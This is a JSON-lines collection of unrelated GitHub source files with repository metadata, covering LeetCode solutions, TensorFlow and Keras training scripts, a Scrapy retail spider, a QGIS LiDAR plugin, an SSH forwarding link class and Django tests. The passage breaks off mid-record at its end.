+{"seq_id":"13172919839","text":"# 给定一个二叉树,它的每个结点都存放一个 0-9 的数字,每条从根到叶子节点的路径都代表一个数字。\n#\n# 例如,从根到叶子节点路径 1->2->3 代表数字 123。 \n#\n# 计算从根到叶子节点生成的所有数字之和。 \n#\n# 说明: 叶子节点是指没有子节点的节点。 \n#\n# 示例 1: \n#\n# 输入: [1,2,3]\n# 1\n# / \\\n# 2 3\n# 输出: 25\n# 解释:\n# 从根到叶子节点路径 1->2 代表数字 12.\n# 从根到叶子节点路径 1->3 代表数字 13.\n# 因此,数字总和 = 12 + 13 = 25.\n#\n# 示例 2: \n#\n# 输入: [4,9,0,5,1]\n# 4\n# / \\\n# 9 0\n# / \\\n# 5 1\n# 输出: 1026\n# 解释:\n# 从根到叶子节点路径 4->9->5 代表数字 495.\n# 从根到叶子节点路径 4->9->1 代表数字 491.\n# 从根到叶子节点路径 4->0 代表数字 40.\n# 因此,数字总和 = 495 + 491 + 40 = 1026.\n#\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Node:\n def __init__(self, item):\n self.item = item\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n q = [self.root]\n\n while True:\n pop_node = q.pop(0)\n if pop_node.left is None:\n pop_node.left = node\n return\n elif pop_node.right is None:\n pop_node.right = node\n return\n else:\n q.append(pop_node.left)\n q.append(pop_node.right)\n\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n self.auxPathSum(root, [], res)\n\n return sum(res)\n\n def auxPathSum(self, root, cur_list, cur_lists):\n if not root:\n return\n if not root.left and not root.right:\n # cur_lists.append(cur_list + [root.item])\n cur_lists.append(int(''.join(str(i) for i in cur_list + [root.item])))\n return\n if root.left:\n self.auxPathSum(root.left, cur_list + [root.item], cur_lists)\n if root.right:\n self.auxPathSum(root.right, cur_list + [root.item], cur_lists)\n\n\nt = Solution()\nfor i in range(1, 4):\n t.add(i)\nprint('遍历:', t.sumNumbers(t.root))\n","repo_name":"wellqin/USTC","sub_path":"leetcode/editor/cn/[129]求根到叶子节点数字之和.py","file_name":"[129]求根到叶子节点数字之和.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"34118032047","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tqdm\nimport matplotlib.pyplot as pl\n\n\nmnist = input_data.read_data_sets('tmp/mnist_data', one_hot=True)\n\nx_train, y_train = mnist.train.images, mnist.train.labels\n\nx = tf.placeholder(tf.float32, shape=[None, 784], name='x_place')\ny = tf.placeholder(tf.float32, shape=[None, 10], name='y_place')\n\n\nnn = tf.layers.conv2d(\n inputs=tf.reshape(x, shape=[-1, 28, 28, 1]),\n filters=32,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\nnn = tf.layers.conv2d(\n inputs=nn,\n filters=64,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\npool_dense = tf.layers.dense(tf.reshape(nn, [-1, 7 * 7 * 64]), units=1024, activation=tf.nn.relu)\nres = tf.layers.dense(pool_dense, units=10, activation=tf.nn.sigmoid)\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=res), name='Loss')\nprediction = tf.argmax(res, axis=1)\n\noptimizer = tf.train.GradientDescentOptimizer(0.03).minimize(loss)\n\nepochs = 1200\nerrors = []\npred_error = []\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in tqdm.tqdm(range(epochs)):\n batch = mnist.train.next_batch(8)\n _, err = sess.run([optimizer, loss], feed_dict={x: batch[0].reshape(8, 784),\n y: batch[1].reshape(8, 10)})\n errors.append(err)\n\n v = mnist.test.next_batch(1)\n pl.imshow(v[0].reshape(28, 28))\n pl.imshow(sess.run(nn, feed_dict={x: v[0].reshape(1, 784)}).reshape(56, 56))\n print()\n print(f\"Pred: {sess.run(prediction, feed_dict={x: v[0].reshape(1, 784)})}\")\n print(f\"Real: {v[1]}\")\n\n# pl.plot(errors)\npl.show()","repo_name":"MikhailKravets/tf","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6519433490","text":"from modelo import actualizarCama, actualizarPaciente, actualizarServicio, camasVacias, eliminarPaciente, ingresarPaciente, insertarPaciente, readCamas, readPacientes, readServicio\n\nseleccion2=0\nclass Menu:\n def __init__(self,*arg):\n self.opciones=arg\n def __str__(self) -> str:\n texto=\"seleccione una opcion\"\n for i in range(len(self.opciones)):\n texto+=f\"\\n{i+1} - {self.opciones[i]}\"\n return texto+\"\\n\"\n\n \ndef wrapCrearPaciente ():\n insertarPaciente(input(\"Inserte el nombre\\n\"), input(\"Inserte RUT del paciente\\n\"),input(\"Ingrese la fecha de nacimiento\\n\"))\n print(\"Paciente creado con èxito\")\n\ndef wrapEliminarPaciente ():\n eliminarPaciente(input(\"Nombre del paciente\\n\"))\n print(\"Paciente eliminado con èxito\")\n\ndef wrapEditarPaciente ():\n actualizarPaciente(input(\"Ingrese el nombre del paciente\\n\"), input(\"Ingrese nombre nuevo\"))\n\ndef wrapActualizarCama ():\n actualizarCama(input(\"Ingrese le nombre de la cama\\n\"), input(\"Ingrese el nuevo nombre de la cama\\n\"))\ndef wrapActualizarServicio ():\n actualizarServicio(input(\"Ingrese el nombre del servicio\\n\", input(\"Ingrese el nuevo nombre del servicio\\n\")))\n\ndef wrapIngresarPaciente ():\n ingresarPaciente(input(\"Nombre del paciente\\n\"), input(\"Nombre de la cama\\n\"), input (\"Fecha de inicio\"), input(\"Fecha final\"))\n\n\ndef menuInput (menu):\n \"\"\"\n Descripción de la función\n \"\"\" \n seleccion2 = input(menu)\n menuprincipal[int(seleccion)-1][int(seleccion2)]()\n \nmenuprincipal=[\n [lambda : menuInput(Menu(\"Crear\", \"Editar\",\"Listar\",\"Eliminar\")),\n wrapCrearPaciente,\n wrapEditarPaciente,\n readPacientes,\n wrapEliminarPaciente\n ],\n [lambda : menuInput(Menu(\"Consultar cama\", \"Editar cama\", \"Consultar servicios\", \"Editar servicios\")),\n readCamas,\n wrapActualizarCama,\n readServicio,\n wrapActualizarServicio,\n\n ],\n [lambda : menuInput(Menu(\"Ingresar paciente\", \"Consultar camas disponibles\")),\n wrapIngresarPaciente,\n camasVacias,\n ]\n]\nseleccion=input(Menu(\"Pacientes\",\"Mantenedores\",\"Gestiòn de camas\"))\n\nmenuprincipal[int(seleccion)-1][int(seleccion2)]()","repo_name":"Shadowrunner11/TrabajoIgnacio","sub_path":"vista.py","file_name":"vista.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6017952931","text":"from src.models.head import Head\nfrom src.models.loss import OneNetLoss\nimport torch\nfrom src.models.object_detection.matcher import MinCostMatcher\nfrom src.nn.fpn import SimpleFPN\nfrom src.nn.vit import ViT\nfrom einops import rearrange\nfrom src.nn.adapters import ViTAdapterForNeck\nfrom src.models.object_detection.yoto import YOTOForObjectDetection\n\nbackbone = ViTAdapterForNeck(ViT(224, patch_size=16, width=768, layers=4, heads=8, output_dim=512))\nfpn = SimpleFPN(in_channels=768)\nhead = Head(256, channels=256, num_classes=2)\ncriterion = OneNetLoss(num_classes=2, matcher=MinCostMatcher())\n\n\nyoto = YOTOForObjectDetection(backbone, fpn, head)\npixel_values = torch.randn((2, 3, 224, 224))\nouts = yoto(pixel_values)\n\nclass_labels = torch.tensor(\n [\n [1, 0],\n [0, 0],\n ]\n)\nboxes_labels = torch.tensor(\n [\n [\n [0.1, 0.1, 0.3, 0.3],\n [0.2, 0.2, 0.4, 0.4],\n ],\n [[0.1, 0.1, 0.3, 0.3], [0, 0, 0, 0]], # pad\n ]\n)\nmask_labels = torch.tensor([[1, 1], [1, 0]], dtype=torch.bool)\nprint(class_labels.shape, boxes_labels.shape)\n\nfeatures = backbone(pixel_values)\nprint(features[0].shape, print(len(features)))\npyramids = fpn(features)\nouts = head(pyramids)\nlosses = criterion(*outs, class_labels, boxes_labels, torch.tensor([640]), mask_labels)\n\nprint(losses)\n","repo_name":"FrancescoSaverioZuppichini/detector","sub_path":"playgrounds/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"}
+{"seq_id":"38759075509","text":"\"\"\"\nYou are given two positive numbers A and B. You need to find the maximum valued integer X such that:\nX divides A i.e. A % X = 0\nX and B are co-prime i.e. gcd(X, B) = 1\nFor example,\nA = 30\nB = 12\nWe return\nX = 5\n\"\"\"\n\n\n# We know A is the greatest number dividing A. So if A and B are coprime, we can return the value of X to be A.\n# Else, we can try to remove the common factors of A and B from A.\n# We can try to remove the common factors of A and B from A by finding the greatest common divisor\n# (gcd) of A and B and dividing A with that gcd.\n# Mathematically, A = A / gcd(A, B) —— STEP1\n# Now, we repeat STEP1 till we get gcd(A, B) = 1.\n# Atlast, we return X = A\n\nclass Solution:\n # @param A : integer\n # @param B : integer\n # @return an integer\n def cpFact(self, A, B):\n while True:\n A1 = A\n B1 = B\n # Find gcd\n while B1 > 0:\n A1, B1 = B1, A1 % B1\n if A1 == 1:\n return A\n A = A // A1\n return A\n","repo_name":"iamrishap/PythonBits","sub_path":"InterviewBits/math/largest-coprime-divisor.py","file_name":"largest-coprime-divisor.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20542812547","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCustomer: Powerhouse Fitness\nWebsite: http://www.fitness-superstore.co.uk\nExtract all products on site, including product options\n\nTicket link: https://www.assembla.com/spaces/competitormonitor/tickets/4584-powerhouse-fitness-|-superstore-|-new-spider/details#\n\n\"\"\"\n\nimport re\n\nfrom datetime import datetime\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\nfrom copy import deepcopy\n\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom product_spiders.items import (Product, ProductLoaderWithNameStrip as ProductLoader)\nfrom scrapy.contrib.loader.processor import MapCompose, Join, TakeFirst, Identity\nfrom scrapy.contrib.loader import XPathItemLoader\nfrom scrapy.utils.markup import remove_entities\nfrom product_spiders.utils import extract_price\nimport logging\n\n\nclass ArgosCoUKKeterSpider(BaseSpider):\n name = 'powerhouse_fitness-fitness-superstore.co.uk'\n allowed_domains = ['fitness-superstore.co.uk']\n start_urls = ['http://www.fitness-superstore.co.uk/']\n \n custom_settings = {'COOKIES_ENABLED': False}\n\n def parse(self, response):\n categories = response.xpath('//ul[@id=\"nav\"]//a/@href').extract()\n for url in categories:\n yield Request(response.urljoin(url))\n\n sub_categories = response.xpath('//div[contains(@class, \"sub-cat-block\")]/a/@href').extract()\n for url in sub_categories:\n yield Request(response.urljoin(url))\n\n pages = response.xpath('//div[@class=\"pages\"]//li/a/@href').extract()\n for url in pages:\n yield Request(response.urljoin(url))\n\n products = response.xpath('//div[@class=\"product-item__name\"]//a/@href').extract()\n if products:\n category_names = response.xpath('//div[@class=\"breadcrumbs\"]//li/a/text()').extract()\n category_names += response.xpath('//div[@class=\"breadcrumbs\"]//li/strong/text()').extract()\n category_names = ' > '.join(category_names[1:])\n for url in products:\n yield Request(response.urljoin(url), callback=self.parse_product, meta={'category': category_names})\n\n identifier = response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n if identifier:\n for product in self.parse_product(response):\n yield product\n\n def parse_product(self, response):\n url = response.url\n\n l = ProductLoader(item=Product(), response=response)\n\n name = response.xpath('//span[@itemprop=\"name\"]/text()').extract()\n try:\n name = name[0].strip()\n except IndexError:\n retry = response.meta.get('retry', 0)\n if retry <= 3:\n yield Request(response.url, dont_filter=True, callback=self.parse_product, meta={'retry': retry + 1})\n\n l.add_value('name', name)\n\n price = response.xpath('//p[@class=\"special-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n else:\n price = response.xpath('//span[@class=\"regular-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n l.add_value('price', price)\n\n sku = response.xpath('//div[@class=\"product-shop--sku\"]/h4/span/text()').extract()\n l.add_value('sku', sku[0])\n \n identifier = response.css('div.nosto_product span.product_id::text').extract() or response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n l.add_value('identifier', identifier[0])\n\n l.add_value('category', response.meta.get('category', ''))\n\n image_url = response.xpath('//span[@class=\"image_url\"]/text()').extract()\n l.add_value('image_url', image_url)\n l.add_value('url', url)\n l.add_xpath('brand', '//span[@class=\"brand\"]/text()')\n \n out_of_stock = response.xpath('//div[contains(@class, \"availability-box\")]/p[contains(@class, \"out-of-stock\")]')\n if out_of_stock:\n l.add_value('stock', 0)\n\n item = l.load_item()\n\n options = response.xpath('//table[@id=\"super-product-table\"]/tbody/tr')\n if options:\n for option in options:\n option_item = deepcopy(item)\n option_item['name'] = option.xpath('td[1]/text()').extract()[0]\n price = option.xpath('td//span[@class=\"price\"]/text()').extract()\n price = extract_price(price[0]) if price else 0\n option_item['price'] = price\n identifier = option.xpath('td//input/@name').re('\\[(.*)\\]')\n if not identifier:\n identifier = option.xpath('td//span/@id').re('product-price-(.*)')\n option_item['stock'] = 0\n\n option_item['identifier'] += '-' + identifier[0]\n yield option_item\n else:\n yield item\n\n\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/powerhouse_fitness/fitness_superstore.py","file_name":"fitness_superstore.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30129716817","text":"\"\"\"\r\n\n\nReplace the numbers in a string with their binary form.\n\n### Examples\n\n replace_nums(\"I have 2 sheep.\") ➞ \"I have 10 sheep.\"\n \n replace_nums(\"My father was born in 1974.10.25.\") ➞ \"My father was born in 11110110110.1010.11001.\"\n \n replace_nums(\"10hell76o4 boi\") ➞ \"1010hell1001100o100 boi\"\n\n### Notes\n\n * There are possibly two or more numbers in a single word (I do not recommend splitting the text at spaces, it surely won't help).\n * Anything separates two numbers, even spaces (\"2 2\" --> \"10 10\").\n\n\"\"\"\r\n\ndef replace_nums(string):\n newstring,num = \"\",\"\"\n for index,i in enumerate(string):\n if not i.isdigit():\n if num != \"\":\n newstring += bin(int(num))[2:]\n num = \"\"\n newstring += i\n else:num += i\n return newstring\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kfwTnnJjo3SKG2pYx_2.py","file_name":"kfwTnnJjo3SKG2pYx_2.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9514431246","text":"from keras.datasets import boston_housing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout\n\n(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()\n\nprint(train_data.shape)\nprint(test_data.shape)\n\n# ...Scaler 사용해서 정규화\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nscaler = StandardScaler()\n# scaler = MinMaxScaler()\n\nscaler.fit(train_data)\ntrain_data = scaler.transform(train_data)\ntest_data = scaler.transform(test_data)\n\nfrom keras import models\nfrom keras import layers\n\ndef build_model():\n # 동일한 모델을 여러 번 생성할 것이므로 함수를 만들어 사용합니다.\n model = models.Sequential()\n model.add(layers.Dense(32, activation='relu', input_shape=(train_data.shape[1],)))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(1))\n model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])\n return model\n\nseed = 77\nfrom keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor\nfrom sklearn.model_selection import KFold, cross_val_score\nmodel = KerasRegressor(build_fn=build_model, epochs=10,\n batch_size=1, verbose=1)\nkfold = KFold(n_splits=5, shuffle=True, random_state=seed)\nresults = cross_val_score(model, train_data, train_targets, cv=kfold) # cv == cross Validation 교차검증\n\nimport numpy as np\nprint(results)\nprint(np.mean(results))\n\n# 1. 사이킷런의 KFold로 리파인 시킬 것\n# 2. 정규화 표준화 시킬 것\n# 3. np.mean(all_scores)를 1 이하로 낮출 것\n\n\n# from sklearn.model_selection import KFold\n# kf = KFold(n_splits=5)\n# for train_index, test_index in kf.split(train_data, train_targets):\n# partial_train_data, val_data = train_data[train_index], train_data[test_index]\n# partial_train_targets, val_targets = train_targets[train_index], train_targets[test_index]\n# print(train_index, test_index)\n\n","repo_name":"jamiedotpro/etc","sub_path":"keras/keras31_kfold.py","file_name":"keras31_kfold.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9785322318","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n/***************************************************************************\r\n LiDARForestryHeight\r\n A QGIS plugin. LiDAR Forestry Height\r\n generates a DEM with the forest height,\r\n calculated from a classified LiDAR point\r\n cloud using LasPy Library\r\n\r\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\r\n -------------------\r\n begin : 2018-09-24\r\n copyright : (C) 2019 by PANOimagen S.L.\r\n email : info@panoimagen.com\r\n git sha : $Format:%H$\r\n ***************************************************************************/\r\n\r\n/***************************************************************************\r\n * *\r\n * This program is free software; you can redistribute it and/or modify *\r\n * it under the terms of the GNU General Public License as published by *\r\n * the Free Software Foundation; either version 2 of the License, or *\r\n * (at your option) any later version. *\r\n * *\r\n ***************************************************************************/\r\n\"\"\"\r\nfrom __future__ import unicode_literals\r\nimport os\r\n\r\nfrom qgis.PyQt import uic\r\nfrom qgis.PyQt import QtWidgets\r\n\r\nimport logging\r\nlogger = logging.getLogger(\"lfh\")\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nfrom qgis.core import Qgis, QgsRasterLayer, QgsProject\r\nfrom qgis.gui import QgisInterface, QgsMessageBar\r\n\r\nfrom .lfh_errors import LasPyNotFoundError\r\n\r\ntry:\r\n from . import plugin_process\r\n LASPY_INSTALLED = True\r\nexcept LasPyNotFoundError as e:\r\n LASPY_INSTALLED = False\r\n \r\nfrom. import files_paths_funs as dir_fns\r\n\r\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\r\n os.path.dirname(__file__), 'LiDARForestryHeight_dialog_base.ui'))\r\n\r\n\r\nclass LiDARForestryHeightDialog(QtWidgets.QDialog, FORM_CLASS):\r\n def __init__(self, parent=None):\r\n \"\"\"Constructor.\"\"\"\r\n super(LiDARForestryHeightDialog, self).__init__(parent)\r\n # Set up the user interface from Designer.\r\n # After setupUI you can access any designer object by doing\r\n # self., and you can use autoconnect slots - see\r\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\r\n # #widgets-and-dialogs-with-auto-connect\r\n self.setupUi(self)\r\n self._initUi()\r\n self.iface = QgisInterface\r\n self.buttonBox.accepted.connect(self.accept)\r\n self.buttonBox.accepted.connect(self.preparingProcess)\r\n self.buttonBox.rejected.connect(self.reject)\r\n\r\n self.addResultsCheckBox.setChecked(True)\r\n self.createAndLoadIntermCheckBox.setChecked(False)\r\n\r\n self.outputFolderToolButton.clicked.connect(self.setOutPath)\r\n self.inputToolButton.clicked.connect(self.inputLiDAR)\r\n\r\n def _initUi(self):\r\n from . import version_number\r\n version = version_number.get_version_from_metadata()\r\n self.versionLabel.setText(u'Version: {}'.format(version))\r\n\r\n if LASPY_INSTALLED:\r\n text = u'LasPy Library avaible'\r\n color = u'color: black'\r\n else:\r\n text = (u'LasPy Library is not installed. Visit' +\r\n u' plugin homepage or LasPy documentation')\r\n color = u'color: red'\r\n\r\n self.lasPyInstalledLabel.setText(text)\r\n self.lasPyInstalledLabel.setStyleSheet(color)\r\n\r\n interpolate_methods = ['nearest', 'linear', 'cubic']\r\n self.interpolatingMethodComboBox.addItems(interpolate_methods)\r\n\r\n self.updateUi()\r\n\r\n def updateUi(self):\r\n \"\"\" Enable/disable UI options if LasPy Library is/isn't installed\r\n \"\"\"\r\n self.pluginGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.inputGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.resultsParamsGroupBox.setEnabled(LASPY_INSTALLED)\r\n\r\n def inputLiDAR(self):\r\n fileNames = QtWidgets.QFileDialog.getOpenFileNames(self,\r\n u\"Select the input LiDAR classified file/s\",\r\n self.inputLineEdit.text(),\r\n (\"LiDAR files (*.laz *.LAZ* *.las *.LAS);;\" +\r\n \" All files (*)\"))\r\n if fileNames:\r\n # quoted = ['\"{}\"'.format(fn) for fn in fileNames]\r\n self.inputLineEdit.setText(\", \".join(fileNames[0]))\r\n if not self.outputFolderLineEdit.text():\r\n try:\r\n outPath = os.path.join(\r\n os.path.split(os.path.abspath(fileNames[0][0]))[0],\r\n u'lidar_forestry_height_output')\r\n self.outputFolderLineEdit.setText(outPath)\r\n except IndexError:\r\n pass\r\n\r\n def setOutPath(self):\r\n \"\"\"Function to select the output folder and update the LineEdit\r\n \"\"\"\r\n outPath = QtWidgets.QFileDialog.getExistingDirectory(self,\r\n u\"Select the output folder\",\r\n self.outputFolderToolButton.text())\r\n if outPath:\r\n self.outputFolderLineEdit.setText(os.path.join(\r\n outPath, u'lidar_forestry_height_output'))\r\n\r\n def preparingProcess(self):\r\n\r\n if not LASPY_INSTALLED:\r\n self.showQMessage(u\"Error: LasPy Library is not installed!\" +\r\n u\"\\nPlease, solve it. More information\" +\r\n u\" at plugin homepage.\")\r\n return\r\n\r\n filenames = self.inputLineEdit.text()\r\n\r\n if not filenames:\r\n self.showQMessage(u\"Error: Not input file selected!\\nPlease,\" +\r\n u\" select one.\")\r\n\r\n outPath = self.outputFolderLineEdit.text()\r\n\r\n if not outPath:\r\n self.showQMessage(u\"Error: Not output folder selected!\\n\" +\r\n u\"Please, select one.\")\r\n\r\n if filenames and outPath:\r\n for f in filenames.split(\",\"):\r\n full_filename = f.strip()\r\n _, filename = os.path.split(full_filename)\r\n if outPath:\r\n self.settingProcessParams(full_filename, outPath)\r\n\r\n def settingProcessParams(self, full_filename, outPath):\r\n\r\n self.pixel_size = self.pixelSizeDoubleSpinBox.value()\r\n self.inter_method = self.interpolatingMethodComboBox.currentText()\r\n self.load_result = self.addResultsCheckBox.isChecked()\r\n self.partials_create_load = self.createAndLoadIntermCheckBox.isChecked()\r\n\r\n _, filename = os.path.split(full_filename)\r\n base_name, ext = os.path.splitext(filename)\r\n start_index = 1\r\n out_path = os.path.join(\r\n outPath, (base_name + '_r' + str(start_index)))\r\n\r\n if os.path.exists(out_path):\r\n import glob\r\n key_for_glob = os.path.join(outPath, (base_name + '_r*' ))\r\n dirs_list = glob.glob(key_for_glob)\r\n indexes = []\r\n for directory in dirs_list:\r\n try:\r\n fn_index = int(directory[-3:])\r\n except ValueError:\r\n try:\r\n fn_index = int(directory[-2:])\r\n except ValueError:\r\n fn_index = int(directory[-1])\r\n indexes.append(fn_index)\r\n max_index = max(indexes)\r\n next_index = max_index + 1\r\n out_path = os.path.join(outPath,\r\n (base_name + '_r' + str(next_index)))\r\n\r\n self.dir_fns = dir_fns.DirAndPaths(filename, out_path)\r\n\r\n self.showMessage(u'Starting processing LiDAR data {}'.format(base_name),\r\n Qgis.MessageLevel(0))\r\n\r\n try:\r\n self.process = plugin_process.Process(full_filename,\r\n out_path,\r\n self.pixel_size,\r\n self.inter_method,\r\n self.partials_create_load)\r\n\r\n except (ValueError, OSError) as message:\r\n self.showQMessage(str(message))\r\n self.showMessage('LiDAR Forestry Height stopped process',\r\n Qgis.MessageLevel(1))\r\n return\r\n\r\n if self.partials_create_load:\r\n self.load_raster_layer(self.process.dirs.out_paths['dtm'])\r\n self.load_raster_layer(self.process.dirs.out_paths['dsm'])\r\n\r\n if self.load_result:\r\n self.load_raster_layer(self.process.dirs.out_paths['height'])\r\n\r\n def load_raster_layer(self, raster_full_path):\r\n \"\"\"Add the result to canvas.\r\n \"\"\"\r\n raster_filename, _ = os.path.splitext(os.path.split(raster_full_path)[-1])\r\n rlayer = QgsRasterLayer(raster_full_path,\r\n raster_filename)\r\n QgsProject.instance().addMapLayer(rlayer)\r\n\r\n def showMessage(self, message, msg_level):\r\n \"\"\"This function shows a QGIS message bar when is called with the\r\n message and the message Level -i.e.:INFO-\r\n \"\"\"\r\n QgsMessageBar().pushMessage(\r\n message, level=msg_level)\r\n\r\n def showQMessage(self, message, msg_level = \"Error message\"):\r\n \"\"\"This function shows a Qt message dialog when is called with the\r\n message and the message Level-\r\n \"\"\"\r\n QtWidgets.QMessageBox.warning(self, msg_level, message)\r\n","repo_name":"PANOimagen/LiDARForestryHeight","sub_path":"LiDARForestryHeight_dialog.py","file_name":"LiDARForestryHeight_dialog.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"}
+{"seq_id":"41455835479","text":"import os\n\nimport synapse.dyndeps as s_dyndeps\nimport synapse.lib.socket as s_socket\n\nfrom synapse.links.common import *\n\nparamiko = s_dyndeps.getDynMod('paramiko')\n\nclass SshRelay(LinkRelay):\n '''\n Implements the SSH link protocol for synapse.\n\n ssh://[user[:passwd]@][:port]/?forward=[&keyfile=]\n\n '''\n proto = 'ssh'\n\n def _reqValidLink(self):\n\n if paramiko is None:\n raise Exception('paramiko module not installed')\n\n if self.link[1].get('port') is None:\n self.link[1]['port'] = 22\n\n host = self.link[1].get('host')\n if host is None:\n raise s_common.PropNotFound('host')\n\n fwdstr = self.link[1].get('forward')\n if fwdstr is None:\n raise s_common.PropNotFound('forward=')\n\n keyfile = self.link[1].get('keyfile')\n if keyfile is not None and not os.path.isfile(keyfile):\n raise Exception('keyfile not found: %s' % (keyfile,))\n\n fwdhost, fwdport = fwdstr.split(':')\n try:\n fwdport = int(fwdport, 0)\n except ValueError as e:\n raise Exception('Bad Forward Port: %r' % (fwdport,))\n\n self.link[1]['fwdhost'] = fwdhost\n self.link[1]['fwdport'] = fwdport\n\n def _listen(self):\n raise Exception('Synapse Link: SSH Listen Not Supported (yet)')\n\n def _connect(self):\n\n host = self.link[1].get('host')\n user = self.link[1].get('user')\n port = self.link[1].get('port')\n passwd = self.link[1].get('passwd')\n keyfile = self.link[1].get('keyfile')\n timeout = self.link[1].get('timeout')\n\n try:\n\n ssh = paramiko.client.SSHClient()\n ssh.load_system_host_keys()\n\n ssh.connect(host, port=port, username=user, password=passwd, key_filename=keyfile, timeout=timeout, allow_agent=True)\n\n trns = ssh.get_transport()\n\n fwdhost = self.link[1].get('fwdhost')\n fwdport = self.link[1].get('fwdport')\n\n s = trns.open_channel('direct-tcpip', (fwdhost, fwdport), ('127.0.0.1', 0))\n\n return s_socket.Socket(s, ssh=ssh)\n\n except s_common.sockerrs as e:\n raiseSockError(self.link, e)\n\n except Exception as e:\n ssh.close()\n raise\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/links/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"34277393028","text":"from django.test import TestCase,Client\r\nimport packing\r\nimport json\r\n# from login import func\r\n\r\n# Create your tests here.\r\nclass func_testcase(TestCase):\r\n def setUp(self):\r\n packing.loaddata()\r\n self.appname = 'conf'\r\n self.tablename = 'ConfExaminationItem'\r\n self.c = Client()\r\n\r\n def test_func_impl_loadattrs(self):\r\n # packing.loaddata()\r\n\r\n c = self.c\r\n # appname = 'conf'\r\n # tablename = 'ConfExaminationItem'\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadattrs',data=data)\r\n\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadattrs',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadall(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadall',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadall',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'condition':json.dumps({\r\n 'id':1\r\n }),\r\n }\r\n response = c.post('/impl/loadfilter',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadfilter',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_cmpl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'tablelist':json.dumps(['conf.ConfExaminationItem', 'conf.ConfExaminationPlot']),\r\n 'condition':json.dumps({'id':2})\r\n }\r\n response = c.post('/cmpl/loadfilter',data=data)\r\n self.assertEqual(response.status_code, 200)\r\n # print ('test func cmpl loadfilter: ', str(response.content, 